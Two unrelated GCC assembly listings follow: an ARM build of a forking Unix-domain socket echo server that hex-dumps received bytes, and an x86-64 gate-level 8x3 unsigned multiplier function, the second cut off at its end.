.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "257044.c" .text .section .rodata .align 2 .LC0: .ascii ", \000" .align 2 .LC1: .ascii "0x%02hhx\000" .text .align 2 .global fprintBytes .syntax unified .arm .fpu softvfp .type fprintBytes, %function fprintBytes: @ args = 0, pretend = 0, frame = 24 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #24 str r0, [fp, #-16] str r1, [fp, #-20] str r2, [fp, #-24] mov r3, #0 str r3, [fp, #-8] b .L2 .L4: ldr r3, [fp, #-8] cmp r3, #0 beq .L3 ldr r3, [fp, #-16] mov r2, #2 mov r1, #1 ldr r0, .L5 bl fwrite .L3: ldr r2, [fp, #-20] ldr r3, [fp, #-8] add r3, r2, r3 ldrb r3, [r3] @ zero_extendqisi2 mov r2, r3 ldr r1, .L5+4 ldr r0, [fp, #-16] bl fprintf ldr r3, [fp, #-8] add r3, r3, #1 str r3, [fp, #-8] .L2: ldr r2, [fp, #-8] ldr r3, [fp, #-24] cmp r2, r3 bcc .L4 nop nop sub sp, fp, #4 @ sp needed pop {fp, pc} .L6: .align 2 .L5: .word .LC0 .word .LC1 .size fprintBytes, .-fprintBytes .align 2 .global fprintSockaddrUn .syntax unified .arm .fpu softvfp .type fprintSockaddrUn, %function fprintSockaddrUn: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #8 str r0, [fp, #-8] str r1, [fp, #-12] ldr r3, [fp, #-12] add r3, r3, #2 ldr r1, [fp, #-8] mov r0, r3 bl fputs nop sub sp, fp, #4 @ sp needed pop {fp, pc} .size fprintSockaddrUn, .-fprintSockaddrUn .section .rodata .align 2 .LC2: .ascii "inet_ntop\000" .align 2 .LC3: .ascii "errno: %d\012\000" .align 2 .LC4: .ascii "%s:%hu\000" .align 2 .LC5: .word __stack_chk_guard .text .align 2 .global fprintSockaddrIn .syntax unified .arm .fpu softvfp .type fprintSockaddrIn, %function fprintSockaddrIn: @ args = 0, pretend = 0, frame = 40 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #40 str r0, [fp, #-40] str r1, [fp, #-44] ldr r3, .L12 ldr r3, [r3] str r3, [fp, #-8] mov r3,#0 ldr r3, [fp, #-44] add r1, r3, #4 sub r2, fp, #24 mov r3, #16 mov r0, #2 bl inet_ntop str r0, [fp, #-32] ldr r3, [fp, #-32] cmp r3, #0 bne .L9 bl __errno_location mov r3, r0 ldr r3, [r3] str r3, [fp, #-28] ldr r0, .L12+4 bl perror ldr r3, .L12+8 ldr r3, [r3] ldr r2, [fp, #-28] ldr r1, .L12+12 mov r0, r3 bl fprintf b .L8 .L9: ldr r3, [fp, #-44] ldrh r3, [r3, #2] mov r0, r3 bl ntohs mov r3, r0 sub r2, fp, #24 ldr r1, .L12+16 ldr r0, [fp, #-40] bl fprintf .L8: ldr r3, .L12 ldr r2, [r3] ldr r3, [fp, #-8] eors r2, r3, r2 mov r3, #0 beq .L11 bl __stack_chk_fail .L11: sub sp, fp, #4 @ sp needed pop {fp, pc} .L13: .align 2 .L12: .word .LC5 .word .LC2 .word stderr .word .LC3 .word .LC4 .size fprintSockaddrIn, .-fprintSockaddrIn .section .rodata .align 2 .LC6: .ascii "if_indextoname\000" .align 2 .LC7: .ascii "%%%s\000" .align 2 .LC8: .ascii ":%hu\000" .align 2 .LC9: .word __stack_chk_guard .text .align 2 .global fprintSockaddrIn6 .syntax unified .arm .fpu softvfp .type fprintSockaddrIn6, %function fprintSockaddrIn6: @ args = 0, pretend = 0, frame = 96 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #96 str r0, [fp, #-96] str r1, [fp, #-100] ldr r3, .L21 ldr r3, [r3] str r3, [fp, #-8] mov r3,#0 ldr r3, [fp, #-100] add r1, r3, #8 sub r2, fp, #56 mov r3, #46 mov r0, #10 bl inet_ntop str r0, [fp, #-88] ldr r3, [fp, #-88] cmp r3, #0 bne .L15 bl __errno_location mov r3, r0 ldr r3, [r3] str r3, [fp, #-76] ldr r0, .L21+4 bl perror ldr r3, .L21+8 ldr r3, [r3] ldr r2, [fp, #-76] ldr r1, .L21+12 mov r0, r3 bl fprintf b .L14 .L15: sub r3, fp, #56 ldr r1, [fp, #-96] mov r0, r3 bl fputs ldr r3, [fp, #-100] ldr r3, [r3, #24] cmp r3, #0 beq .L17 ldr r3, [fp, #-100] ldr r3, [r3, #24] sub r2, fp, #72 mov r1, r2 mov r0, r3 bl if_indextoname str r0, [fp, #-84] ldr r3, [fp, #-84] cmp r3, #0 bne .L18 bl __errno_location mov r3, r0 ldr r3, [r3] str r3, [fp, #-80] ldr r0, .L21+16 bl perror ldr r3, .L21+8 ldr r3, [r3] ldr r2, [fp, #-80] ldr r1, .L21+12 mov r0, r3 bl fprintf b .L14 .L18: sub r3, fp, #72 mov r2, r3 ldr r1, .L21+20 ldr r0, [fp, #-96] bl fprintf .L17: ldr r3, [fp, #-100] ldrh r3, [r3, #2] mov r0, r3 bl ntohs mov r3, r0 mov r2, r3 ldr r1, .L21+24 ldr r0, [fp, #-96] bl fprintf .L14: ldr r3, .L21 ldr r2, [r3] ldr r3, [fp, #-8] eors r2, r3, r2 mov r3, #0 beq .L20 bl __stack_chk_fail .L20: sub sp, fp, #4 @ sp needed pop {fp, pc} .L22: .align 2 .L21: .word .LC9 .word .LC2 .word stderr .word .LC3 .word .LC6 .word .LC7 .word .LC8 .size fprintSockaddrIn6, .-fprintSockaddrIn6 .section .rodata .align 2 .LC10: .ascii "unknown sa_family: 0x%04hx\000" .align 2 .LC11: .ascii ", sa_data: [\000" .text .align 2 .global fprintSockaddrUnknown .syntax unified .arm .fpu softvfp .type fprintSockaddrUnknown, %function fprintSockaddrUnknown: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #8 str r0, [fp, #-8] str r1, [fp, #-12] ldr r3, [fp, #-12] ldrh r3, [r3] mov r2, r3 ldr r1, .L24 ldr r0, [fp, #-8] bl fprintf ldr r3, [fp, #-8] mov r2, #12 mov r1, #1 ldr r0, .L24+4 bl fwrite ldr r3, [fp, #-12] add r3, r3, #2 mov r2, #14 mov r1, r3 ldr r0, [fp, #-8] bl fprintBytes ldr r1, [fp, #-8] mov r0, #93 bl fputc nop sub sp, fp, #4 @ sp needed pop {fp, pc} .L25: .align 2 .L24: .word .LC10 .word .LC11 .size fprintSockaddrUnknown, .-fprintSockaddrUnknown .align 2 .global fprintSockaddr .syntax unified .arm .fpu softvfp .type fprintSockaddr, %function fprintSockaddr: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #8 str r0, [fp, #-8] str r1, [fp, #-12] ldr r3, [fp, #-12] ldrh r3, [r3] cmp r3, #10 beq .L27 cmp r3, #10 bgt .L28 cmp r3, #1 beq .L29 cmp r3, #2 beq .L30 b .L28 .L29: ldr r1, [fp, #-12] ldr r0, [fp, #-8] bl fprintSockaddrUn b .L31 .L30: ldr r1, [fp, #-12] ldr r0, [fp, #-8] bl fprintSockaddrIn b .L31 .L27: ldr r1, [fp, #-12] ldr r0, [fp, #-8] bl fprintSockaddrIn6 b .L31 .L28: ldr r1, [fp, #-12] ldr r0, [fp, #-8] bl fprintSockaddrUnknown nop .L31: nop sub sp, fp, #4 @ sp needed pop {fp, pc} .size fprintSockaddr, .-fprintSockaddr .section .rodata .align 2 .LC12: .ascii "recv\000" .align 2 .LC13: .ascii "[EOF]\000" .align 2 .LC14: .ascii "send\000" .align 2 .LC15: .word __stack_chk_guard .text .align 2 .global childProc .syntax unified .arm .fpu softvfp .type childProc, %function childProc: @ args = 116, pretend = 16, frame = 1048 @ frame_needed = 1, uses_anonymous_args = 0 sub sp, sp, #16 push {fp, lr} add fp, sp, #4 sub sp, sp, #1040 sub sp, sp, #8 add ip, fp, #4 stm ip, {r0, r1, r2, r3} ldr r3, .L47 ldr r3, [r3] str r3, [fp, #-8] mov r3,#0 .L33: sub r1, fp, #1024 sub r1, r1, #4 sub r1, r1, #4 mov r3, #0 mov r2, #1024 ldr r0, [fp, #116] bl recv str r0, [fp, #-1048] ldr r3, [fp, #-1048] cmn r3, #1 bne .L34 bl __errno_location mov r3, r0 ldr r3, [r3] str r3, [fp, #-1036] ldr r0, .L47+4 bl perror ldr r3, .L47+8 ldr r3, [r3] ldr r2, [fp, #-1036] ldr r1, .L47+12 mov r0, r3 bl fprintf ldr r3, [fp, #-1036] cmp r3, #11 beq .L33 ldr r3, [fp, #-1036] cmp r3, #4 bne .L45 b .L33 .L34: ldr r3, [fp, #-1048] cmp r3, #0 bne .L38 ldr r0, .L47+16 bl printf b .L32 .L38: ldr r3, .L47+20 ldr r0, [r3] ldr r2, [fp, #-1048] sub r3, fp, #1024 sub r3, r3, #4 sub r3, r3, #4 mov r1, r3 bl fprintBytes .L39: ldr r2, [fp, #-1048] sub r1, fp, #1024 sub r1, r1, #4 sub r1, r1, #4 mov r3, #0 ldr r0, [fp, #116] bl send str r0, [fp, #-1044] ldr r3, [fp, #-1044] cmn r3, #1 bne .L33 bl __errno_location mov r3, r0 ldr r3, [r3] str r3, [fp, #-1040] ldr r0, .L47+24 bl perror ldr r3, .L47+8 ldr r3, [r3] ldr r2, [fp, #-1040] ldr r1, .L47+12 mov r0, r3 bl fprintf ldr r3, [fp, #-1040] cmp r3, #11 beq .L33 ldr r3, [fp, #-1040] cmp r3, #4 bne .L46 b .L33 .L45: nop b .L32 .L46: nop .L32: ldr r3, .L47 ldr r2, [r3] ldr r3, [fp, #-8] eors r2, r3, r2 mov r3, #0 beq .L44 bl __stack_chk_fail .L44: sub sp, fp, #4 @ sp needed pop {fp, lr} add sp, sp, #16 bx lr .L48: .align 2 .L47: .word .LC15 .word .LC12 .word stderr .word .LC3 .word .LC13 .word stdout .word .LC14 .size childProc, .-childProc .section .rodata .align 2 .LC16: .ascii "accept\000" .align 2 .LC17: .ascii "fork\000" .align 2 .LC18: .word __stack_chk_guard .text .align 2 .global acceptMain .syntax unified .arm .fpu softvfp .type acceptMain, %function acceptMain: @ args = 0, pretend = 0, frame = 144 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #248 str r0, [fp, #-144] ldr r3, .L56 ldr r3, [r3] str r3, [fp, #-8] mov r3,#0 sub r3, fp, #120 mov r2, #110 mov r1, #0 mov r0, r3 bl memset mov r3, #110 str r3, [fp, #-140] mvn r3, #0 str r3, [fp, #-136] sub r2, fp, #140 sub r3, fp, #120 mov r1, r3 ldr r0, [fp, #-144] bl accept str r0, [fp, #-136] ldr r3, [fp, #-136] cmn r3, #1 bne .L50 bl __errno_location mov r3, r0 ldr r3, [r3] str r3, [fp, #-124] ldr r0, .L56+4 bl perror ldr r3, .L56+8 ldr r3, [r3] ldr r2, [fp, #-124] ldr r1, .L56+12 mov r0, r3 bl fprintf b .L51 .L50: bl fork mov r3, r0 str r3, [fp, #-132] ldr r3, [fp, #-132] cmn r3, #1 bne .L52 bl __errno_location mov r3, r0 ldr r3, [r3] str r3, [fp, #-128] ldr r0, .L56+16 bl perror ldr r3, .L56+8 ldr r3, [r3] ldr r2, [fp, #-128] ldr r1, .L56+12 mov r0, r3 bl fprintf b .L51 .L52: ldr r3, [fp, #-132] cmp r3, #0 bne .L53 ldr r0, [fp, #-144] bl close ldr r3, [fp, #-136] str r3, [sp, #96] mov r0, sp sub r3, fp, #104 mov r2, #94 mov r1, r3 bl memcpy sub r3, fp, #120 ldm r3, {r0, r1, r2, r3} bl childProc mov r0, #0 bl exit .L53: ldr r0, [fp, #-136] bl close mvn r3, #0 str r3, [fp, #-136] .L51: ldr r3, [fp, #-136] cmn r3, #1 beq .L54 ldr r0, [fp, #-136] bl close .L54: nop ldr r2, .L56 ldr r1, [r2] ldr r2, [fp, #-8] eors r1, r2, r1 mov r2, #0 beq .L55 bl __stack_chk_fail .L55: mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .L57: .align 2 .L56: .word .LC18 .word .LC16 .word stderr .word .LC3 .word .LC17 .size acceptMain, .-acceptMain .section .rodata .align 2 .LC19: .ascii "usage: %s path\012\000" .align 2 .LC20: .ascii "unlink\000" .align 2 .LC21: .ascii "socket\000" .align 2 .LC22: .ascii "path too long. path: %zu, sun.sun_path: %zu\012\000" .align 2 .LC23: .ascii "bind\000" .align 2 .LC24: .ascii "listen\000" .align 2 .LC25: .word __stack_chk_guard .text .align 2 .global main .syntax unified .arm .fpu softvfp .type main, %function main: @ args = 0, pretend = 0, frame = 168 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #168 str r0, [fp, #-168] str r1, [fp, #-172] ldr r3, .L70 ldr r3, [r3] str r3, [fp, #-8] mov r3,#0 mov r3, #1 str r3, [fp, #-160] mov r3, #0 str r3, [fp, #-156] ldr r3, [fp, #-168] cmp r3, #1 bgt .L59 ldr r3, .L70+4 ldr r0, [r3] ldr r3, [fp, #-172] ldr r3, [r3] mov r2, r3 ldr r1, .L70+8 bl fprintf mov r3, #1 b .L68 .L59: ldr r3, [fp, #-172] ldr r3, [r3, #4] str r3, [fp, #-156] ldr r0, [fp, #-156] bl unlink str r0, [fp, #-152] ldr r3, [fp, #-152] cmp r3, #0 beq .L61 bl __errno_location mov r3, r0 ldr r3, [r3] str r3, [fp, #-148] ldr r3, [fp, #-148] cmp r3, #2 beq .L61 ldr r0, .L70+12 bl perror ldr r3, .L70+4 ldr r3, [r3] ldr r2, [fp, #-148] ldr r1, .L70+16 mov r0, r3 bl fprintf mov r3, #1 b .L68 .L61: mvn r3, #0 str r3, [fp, #-144] mov r2, #0 mov r1, #1 mov r0, #1 bl socket str r0, [fp, #-144] ldr r3, [fp, #-144] cmn r3, #1 bne .L62 bl __errno_location mov r3, r0 ldr r3, [r3] str r3, [fp, #-124] ldr r0, .L70+20 bl perror ldr r3, .L70+4 ldr r3, [r3] ldr r2, [fp, #-124] ldr r1, .L70+16 mov r0, r3 bl fprintf b .L63 .L62: sub r3, fp, #120 mov r2, #110 mov r1, #0 mov r0, r3 bl memset mov r3, #1 strh r3, [fp, #-120] @ movhi ldr r0, [fp, #-156] bl strlen str r0, [fp, #-140] mov r3, #107 str r3, [fp, #-136] ldr r2, [fp, #-140] ldr r3, [fp, #-136] cmp r2, r3 bls .L64 ldr r3, .L70+4 ldr r0, [r3] ldr r3, [fp, #-136] ldr r2, [fp, #-140] ldr r1, .L70+24 bl fprintf b .L63 .L64: sub r3, fp, #120 add r3, r3, #2 mov r2, #107 ldr r1, [fp, #-156] mov r0, r3 bl strncpy sub r3, fp, #120 mov r2, #110 mov r1, r3 ldr r0, [fp, #-144] bl bind str r0, [fp, #-152] ldr r3, [fp, #-152] cmn r3, #1 bne .L65 bl __errno_location mov r3, r0 ldr r3, [r3] str r3, [fp, #-128] ldr r0, .L70+28 bl perror ldr r3, .L70+4 ldr r3, [r3] ldr r2, [fp, #-128] ldr r1, .L70+16 mov r0, r3 bl fprintf b .L63 .L65: mov r1, #10 ldr r0, [fp, #-144] bl listen str r0, [fp, #-152] ldr r3, [fp, #-152] cmn r3, #1 bne .L66 bl __errno_location mov r3, r0 ldr r3, [r3] str r3, [fp, #-132] ldr r0, .L70+32 bl perror ldr r3, .L70+4 ldr r3, [r3] ldr r2, [fp, #-132] ldr r1, .L70+16 mov r0, r3 bl fprintf b .L63 .L66: ldr r0, [fp, #-144] bl acceptMain b .L66 .L63: ldr r3, [fp, #-144] cmn r3, #1 beq .L67 ldr r0, [fp, #-144] bl close .L67: ldr r3, [fp, #-160] .L68: ldr r2, .L70 ldr r1, [r2] ldr r2, [fp, #-8] eors r1, r2, r1 mov r2, #0 beq .L69 bl __stack_chk_fail .L69: mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .L71: .align 2 .L70: .word .LC25 .word stderr .word .LC19 .word .LC20 .word .LC3 .word .LC21 .word .LC22 .word .LC23 .word .LC24 .size main, .-main .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "399231.c" .intel_syntax noprefix .text .globl mul8x3u_1X9 .type mul8x3u_1X9, @function mul8x3u_1X9: .LFB6: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 648 mov QWORD PTR -760[rbp], rdi mov QWORD PTR -768[rbp], rsi mov rax, QWORD PTR -760[rbp] and rax, QWORD PTR -768[rbp] and eax, 1 mov QWORD PTR -752[rbp], rax mov rax, QWORD PTR -760[rbp] shr rax and rax, QWORD PTR -768[rbp] and eax, 1 mov QWORD PTR -744[rbp], rax mov rax, QWORD PTR -760[rbp] shr rax, 2 and rax, QWORD PTR -768[rbp] and eax, 1 mov QWORD PTR -736[rbp], rax mov rax, QWORD PTR -760[rbp] shr rax, 3 and rax, QWORD PTR -768[rbp] and eax, 1 mov QWORD PTR -728[rbp], rax mov rax, QWORD PTR -760[rbp] shr rax, 4 and rax, QWORD PTR -768[rbp] and eax, 1 mov QWORD PTR -720[rbp], rax mov rax, QWORD PTR -760[rbp] shr rax, 5 and rax, QWORD PTR -768[rbp] and eax, 1 mov QWORD PTR -712[rbp], rax mov rax, QWORD PTR -760[rbp] shr rax, 6 and rax, QWORD PTR -768[rbp] and eax, 1 mov QWORD PTR -704[rbp], rax mov rax, QWORD PTR -760[rbp] shr rax, 7 and rax, QWORD PTR -768[rbp] and eax, 1 mov QWORD PTR -696[rbp], rax mov rax, QWORD PTR -768[rbp] shr rax and rax, QWORD PTR -760[rbp] and eax, 1 mov QWORD PTR -688[rbp], rax mov rax, QWORD PTR -760[rbp] shr rax mov rdx, rax mov rax, QWORD PTR -768[rbp] shr rax and rax, rdx and eax, 1 mov QWORD PTR -680[rbp], rax mov rax, QWORD PTR -760[rbp] shr rax, 2 mov rdx, rax mov rax, QWORD PTR -768[rbp] shr rax and rax, rdx and eax, 1 mov QWORD PTR -672[rbp], rax mov rax, QWORD PTR -760[rbp] shr rax, 3 mov rdx, rax mov rax, QWORD PTR -768[rbp] shr rax and rax, rdx and eax, 1 mov QWORD PTR -664[rbp], rax mov rax, QWORD PTR -760[rbp] shr rax, 4 mov rdx, rax mov rax, QWORD PTR -768[rbp] shr rax and rax, rdx and eax, 1 mov QWORD PTR -656[rbp], rax mov rax, QWORD PTR -760[rbp] shr rax, 5 mov rdx, rax mov rax, QWORD PTR -768[rbp] shr rax and rax, rdx and eax, 1 mov QWORD PTR -648[rbp], rax mov rax, QWORD PTR -760[rbp] shr rax, 6 mov rdx, rax mov rax, QWORD PTR -768[rbp] shr rax and rax, rdx and eax, 1 mov QWORD PTR -640[rbp], rax mov rax, QWORD PTR -760[rbp] shr rax, 7 mov rdx, rax mov rax, QWORD PTR -768[rbp] shr rax and rax, rdx and eax, 1 mov QWORD PTR -632[rbp], rax mov rax, QWORD PTR -744[rbp] and rax, QWORD PTR -688[rbp] mov QWORD PTR -624[rbp], rax mov rax, QWORD PTR -744[rbp] xor rax, QWORD PTR -688[rbp] mov QWORD PTR -616[rbp], rax mov rax, QWORD PTR -736[rbp] xor rax, QWORD PTR -680[rbp] mov QWORD PTR -608[rbp], rax mov rax, QWORD PTR -752[rbp] and rax, QWORD PTR -680[rbp] mov QWORD PTR -600[rbp], rax mov rax, QWORD PTR -608[rbp] xor rax, QWORD PTR -624[rbp] mov QWORD PTR -592[rbp], rax mov rax, QWORD PTR -728[rbp] xor rax, QWORD PTR -672[rbp] mov QWORD PTR -584[rbp], rax mov rax, QWORD PTR -728[rbp] and rax, QWORD PTR -672[rbp] mov QWORD PTR -576[rbp], rax mov rax, QWORD PTR -584[rbp] and rax, QWORD PTR -600[rbp] mov QWORD PTR -568[rbp], rax mov rax, QWORD PTR -584[rbp] xor rax, QWORD PTR -600[rbp] mov QWORD PTR -560[rbp], rax mov rax, QWORD PTR -576[rbp] or rax, QWORD PTR -568[rbp] mov QWORD PTR -552[rbp], rax mov rax, QWORD PTR -720[rbp] xor rax, QWORD PTR -664[rbp] mov QWORD PTR -544[rbp], rax mov rax, QWORD PTR -720[rbp] and rax, QWORD PTR -664[rbp] mov QWORD PTR -536[rbp], rax mov rax, QWORD PTR -544[rbp] and rax, QWORD PTR -552[rbp] mov QWORD PTR -528[rbp], rax mov rax, QWORD PTR -544[rbp] xor rax, QWORD PTR -552[rbp] mov QWORD PTR -520[rbp], rax mov rax, QWORD PTR -536[rbp] or rax, QWORD PTR -528[rbp] mov QWORD PTR -512[rbp], rax mov rax, QWORD PTR -712[rbp] xor rax, QWORD PTR -656[rbp] mov QWORD PTR -504[rbp], rax mov rax, QWORD PTR -712[rbp] and rax, QWORD PTR -656[rbp] mov QWORD PTR -496[rbp], rax mov rax, QWORD PTR -504[rbp] and rax, QWORD PTR -512[rbp] mov QWORD PTR -488[rbp], rax mov rax, QWORD PTR -504[rbp] xor rax, QWORD PTR -512[rbp] mov QWORD PTR -480[rbp], rax mov rax, QWORD PTR -496[rbp] or rax, QWORD PTR -488[rbp] mov QWORD PTR -472[rbp], rax mov rax, QWORD PTR -704[rbp] xor rax, QWORD PTR -648[rbp] mov QWORD PTR -464[rbp], rax mov rax, QWORD PTR -704[rbp] and rax, QWORD PTR -648[rbp] mov QWORD PTR -456[rbp], rax mov rax, QWORD PTR -464[rbp] and rax, QWORD PTR -472[rbp] mov QWORD PTR -448[rbp], rax mov rax, QWORD PTR -464[rbp] xor rax, QWORD PTR -472[rbp] mov QWORD PTR -440[rbp], rax mov rax, QWORD PTR -456[rbp] or rax, QWORD PTR -448[rbp] mov QWORD PTR -432[rbp], rax mov rax, QWORD PTR -696[rbp] xor rax, QWORD PTR -640[rbp] mov QWORD PTR -424[rbp], rax mov rax, QWORD PTR -696[rbp] and rax, QWORD PTR -640[rbp] mov QWORD PTR -416[rbp], rax mov rax, QWORD PTR -424[rbp] and rax, QWORD PTR -432[rbp] mov QWORD PTR -408[rbp], rax mov rax, QWORD PTR -424[rbp] xor rax, QWORD PTR -432[rbp] mov QWORD PTR -400[rbp], rax mov rax, QWORD PTR -416[rbp] or rax, QWORD PTR -408[rbp] mov QWORD PTR -392[rbp], rax mov rax, QWORD PTR -392[rbp] and rax, QWORD PTR -632[rbp] mov QWORD PTR -384[rbp], rax mov rax, QWORD PTR -392[rbp] xor rax, QWORD PTR -632[rbp] mov QWORD PTR -376[rbp], rax mov rax, QWORD PTR -768[rbp] shr rax, 2 and rax, QWORD PTR -760[rbp] and eax, 1 mov QWORD PTR -368[rbp], rax mov rax, QWORD PTR -760[rbp] shr rax mov rdx, rax mov rax, QWORD PTR -768[rbp] shr rax, 2 and rax, rdx and eax, 1 mov QWORD PTR -360[rbp], rax mov rax, QWORD PTR -760[rbp] shr rax, 2 mov rdx, rax mov rax, QWORD PTR -768[rbp] shr rax, 2 and rax, rdx and eax, 1 mov QWORD PTR -352[rbp], rax mov rax, QWORD PTR -760[rbp] shr rax, 3 mov rdx, rax mov rax, QWORD PTR -768[rbp] shr rax, 2 and rax, rdx and eax, 1 mov QWORD PTR -344[rbp], rax mov rax, QWORD PTR -760[rbp] shr rax, 4 mov rdx, rax mov rax, QWORD PTR -768[rbp] shr rax, 2 and rax, rdx and eax, 1 mov QWORD PTR -336[rbp], rax mov rax, QWORD PTR -760[rbp] shr rax, 5 mov rdx, rax mov rax, QWORD PTR -768[rbp] shr rax, 2 and rax, rdx and eax, 1 mov QWORD PTR -328[rbp], rax mov rax, QWORD PTR -760[rbp] shr rax, 6 mov rdx, rax mov rax, QWORD PTR -768[rbp] shr rax, 2 and rax, rdx and eax, 1 mov QWORD PTR -320[rbp], rax mov rax, QWORD PTR -760[rbp] shr rax, 7 mov rdx, rax mov rax, QWORD PTR -768[rbp] shr rax, 2 and rax, rdx and eax, 1 mov QWORD PTR -312[rbp], rax mov rax, QWORD PTR -592[rbp] and rax, QWORD PTR -368[rbp] mov QWORD PTR -304[rbp], rax mov rax, QWORD PTR -592[rbp] xor rax, QWORD PTR -368[rbp] mov QWORD PTR -296[rbp], rax mov rax, QWORD PTR -560[rbp] xor rax, QWORD PTR -360[rbp] mov QWORD PTR -288[rbp], rax mov rax, QWORD PTR -560[rbp] and rax, QWORD PTR -360[rbp] mov QWORD PTR -280[rbp], rax mov rax, QWORD PTR -288[rbp] and rax, QWORD PTR -304[rbp] mov QWORD PTR -272[rbp], rax mov rax, QWORD PTR -288[rbp] xor rax, QWORD PTR -304[rbp] mov QWORD PTR -264[rbp], rax mov rax, QWORD PTR -280[rbp] or rax, QWORD PTR -272[rbp] mov QWORD PTR -256[rbp], rax mov rax, QWORD PTR -520[rbp] xor rax, QWORD PTR -352[rbp] mov QWORD PTR -248[rbp], rax mov rax, QWORD PTR -520[rbp] and rax, QWORD PTR -352[rbp] mov QWORD PTR -240[rbp], rax mov rax, QWORD PTR -248[rbp] and rax, QWORD PTR -256[rbp] mov QWORD PTR -232[rbp], rax mov rax, QWORD PTR -248[rbp] xor rax, QWORD PTR -256[rbp] mov QWORD PTR -224[rbp], rax mov rax, QWORD PTR -240[rbp] or rax, QWORD PTR -232[rbp] mov QWORD PTR -216[rbp], rax mov rax, QWORD PTR -480[rbp] xor rax, QWORD PTR -344[rbp] mov QWORD PTR -208[rbp], rax mov rax, QWORD PTR -480[rbp] and rax, QWORD PTR -344[rbp] mov QWORD PTR -200[rbp], rax mov rax, QWORD PTR -208[rbp] and rax, QWORD PTR -216[rbp] mov QWORD PTR -192[rbp], rax mov rax, QWORD PTR -208[rbp] xor rax, QWORD PTR -216[rbp] mov QWORD PTR -184[rbp], rax mov rax, QWORD PTR -200[rbp] or rax, QWORD PTR -192[rbp] mov QWORD PTR -176[rbp], rax mov rax, QWORD PTR -440[rbp] xor rax, QWORD PTR -336[rbp] mov QWORD PTR -168[rbp], rax mov rax, QWORD PTR -440[rbp] and rax, QWORD PTR -336[rbp] mov QWORD PTR -160[rbp], rax mov rax, QWORD PTR -168[rbp] and rax, QWORD PTR -176[rbp] mov QWORD PTR -152[rbp], rax mov rax, QWORD PTR -168[rbp] xor rax, QWORD PTR -176[rbp] mov QWORD PTR -144[rbp], rax mov rax, QWORD PTR -160[rbp] or rax, QWORD PTR -152[rbp] mov QWORD PTR -136[rbp], rax mov rax, QWORD PTR -400[rbp] xor rax, QWORD PTR -328[rbp] mov QWORD PTR -128[rbp], rax mov rax, QWORD PTR -400[rbp] and rax, QWORD PTR -328[rbp] mov QWORD PTR -120[rbp], rax mov rax, QWORD PTR -128[rbp] and rax, QWORD PTR -136[rbp] mov QWORD PTR -112[rbp], rax mov rax, QWORD PTR -128[rbp] xor rax, QWORD PTR -136[rbp] mov QWORD PTR -104[rbp], rax mov rax, QWORD PTR -120[rbp] or rax, QWORD PTR -112[rbp] mov QWORD PTR -96[rbp], rax mov rax, QWORD PTR -376[rbp] xor rax, QWORD PTR -320[rbp] mov QWORD PTR -88[rbp], rax mov rax, QWORD PTR -376[rbp] and rax, QWORD PTR -320[rbp] mov QWORD PTR -80[rbp], rax mov rax, QWORD PTR -88[rbp] and rax, QWORD PTR -96[rbp] mov QWORD PTR -72[rbp], rax mov rax, QWORD PTR -88[rbp] xor rax, QWORD PTR -96[rbp] mov QWORD PTR -64[rbp], rax mov rax, QWORD PTR -80[rbp] or rax, QWORD PTR -72[rbp] mov QWORD PTR -56[rbp], rax mov rax, QWORD PTR -384[rbp] xor rax, QWORD PTR -312[rbp] mov QWORD PTR -48[rbp], rax mov rax, QWORD PTR -384[rbp] and rax, QWORD PTR -312[rbp] mov QWORD PTR -40[rbp], rax mov rax, QWORD PTR -48[rbp] and rax, QWORD PTR -56[rbp] mov QWORD PTR -32[rbp], rax mov rax, QWORD PTR -48[rbp] xor rax, QWORD PTR -56[rbp] mov QWORD PTR -24[rbp], rax mov rax, QWORD PTR -40[rbp] or rax, QWORD PTR -32[rbp] mov QWORD PTR -16[rbp], rax mov QWORD PTR -8[rbp], 0 mov rax, QWORD PTR -752[rbp] and eax, 1 or QWORD PTR -8[rbp], rax mov rax, QWORD PTR -616[rbp] add rax, rax and eax, 2 or QWORD PTR -8[rbp], rax mov rax, QWORD PTR -296[rbp] sal rax, 2 and eax, 4 or QWORD PTR -8[rbp], rax mov rax, QWORD PTR -264[rbp] sal rax, 3 and eax, 8 or QWORD PTR -8[rbp], rax mov rax, QWORD PTR -224[rbp] sal rax, 4 and eax, 16 or QWORD PTR -8[rbp], rax mov rax, QWORD PTR -184[rbp] sal rax, 5 and eax, 32 or QWORD PTR -8[rbp], rax mov rax, QWORD PTR -144[rbp] sal rax, 6 and eax, 64 or QWORD PTR -8[rbp], rax mov rax, QWORD PTR -104[rbp] sal rax, 7 movzx eax, al or QWORD PTR -8[rbp], rax mov rax, QWORD PTR -64[rbp] sal rax, 8 and eax, 256 or QWORD PTR -8[rbp], rax mov rax, QWORD PTR -24[rbp] sal rax, 9 and eax, 512 or QWORD PTR -8[rbp], rax mov rax, QWORD PTR -16[rbp] sal rax, 10 and eax, 1024 or QWORD PTR -8[rbp], rax mov rax, QWORD PTR -8[rbp] leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE6: .size mul8x3u_1X9, .-mul8x3u_1X9 .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 